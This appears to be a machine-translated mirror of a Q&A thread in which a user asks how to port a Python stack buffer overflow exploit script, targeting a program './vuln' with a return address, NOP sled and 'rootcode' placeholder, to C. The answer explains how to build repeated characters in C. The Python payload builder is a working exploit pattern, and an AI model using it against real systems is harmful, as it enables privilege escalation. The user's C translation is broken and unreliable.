[英]Converting Python program to C: How can I multiply a character by a specified value and store it into a variable?
在將 Python 中的小緩沖區溢出腳本轉換為 C 方面需要一般幫助。這是一個黑客工作,我正在努力使數據類型正確。 我可以只用一個警告來編譯所有內容:“初始化使指針從整數而不進行強制轉換- char *buff = ("%0*i", 252, 'A'); ” 這一行應該給變量 buff 252 個“A”字符的值。
我知道更改數據類型可以解決這個問題,但程序的其余部分依賴於作為指針char * 的溢出。 如果有人對我的程序的任何部分有任何提示,他們將不勝感激。
干杯,希夫
原始蟒蛇:
stack_addr = 0xbffff1d0
rootcode = "\x31"
def conv(num):
return struct.pack("<I",num)
buff = "A" * 172
buff += conv(stack_addr)
buff += "\x90" * 30
buff += rootcode
buff += "A" * 22
print "targetting vulnerable program"
call(["./vuln", buff])
轉換后的 C 代碼:
//endianess convertion
int conv(int stack_addr)
{
(stack_addr>>8) | (stack_addr<<8);
return(0);
}
int main(int argc, char *argv[])
{
int stack_addr = 0xbffff1d0;
int rootcode = *"\x31"
char *buff = ("%0*i", 252, 'A'); //give buff the value of 252 'A's
buff += conv(stack_addr); //endian conversion
buff += ("%0*i", 30, '\x90'); //append buff variable with 30 '\x90'
buff = buff + rootcode; //append buff with value of rootcode variable
buff += ("%0*i", 22, 'A'); //append buff with 22 'A's
}
手動編寫具有所需字符數的字符串的最簡單方法。 使用您最喜歡的文本編輯器的復制粘貼功能。
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
您還可以使用 for 循環從單個字符構建它,如下所述。 但是,您可以跳過構建長字符串的部分,並將單個字符直接附加到最終字符串。 這可以通過兩種方式完成:使用strcat和不使用strcat 。 第一種方法更干凈一點:
char buff[400] = ""; // note: this should be an array, not a pointer!
// the array should be big enough to hold the final string; 400 seems enough
for (int i = 0; i < 252; i++)
strcat(buff, "A"); // this part appends one string of length 1
函數strcat效率低下; 每次將字符串"A"附加到字符串時,它都會計算字符串的長度。 您不需要速度,但如果您決定有效地編寫它,請不要使用strcat ,並使用核心 C 語言將單個char (字節)附加到數組:
char buff[400]; // note: this should be an array, not a pointer!
int pos = 0; // position at which to write data
for (int i = 0; i < 252; i++)
buff[pos++] = 'A'; // this part appends one char 'A'; note single quotes
...
buff[pos++] = '\0'; // don't forget to terminate the string!
如何使用 python 將字符串中的元素相乘並將結果字符串存儲在變量中?
[英]How can I multiply elements in a string using python and store resulting string in a variable?
Python 3:如何在變量中取值並將其轉換為 unicode 字符?
[英]Python 3: How can I take a value in a variable and convert that to a unicode character?
如何在Python中獲取字符的位置並將其存儲在變量中?
[英]How to get the position of a character in Python and store it in a variable?
如何將密碼查詢值存儲到python函數內的變量中?
[英]How can I store the cypher query value into a variable inside python function?
我不知道如何在數據庫上執行SUM函數並將值存儲到python變量中
[英]I can't figure out how to perform the SUM function on a DB and store the value into a python variable
Python - 如何在作為變量的Unicode字符上執行字符串查找?
[英]Python - How can I do a string find on a Unicode character that is a variable?
我如何在python中編寫程序以將字符串中的字符替換為其他字符,而不考慮大小寫
[英]How can I write a program in python to replace character in string with other character irrespective of case-letter
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.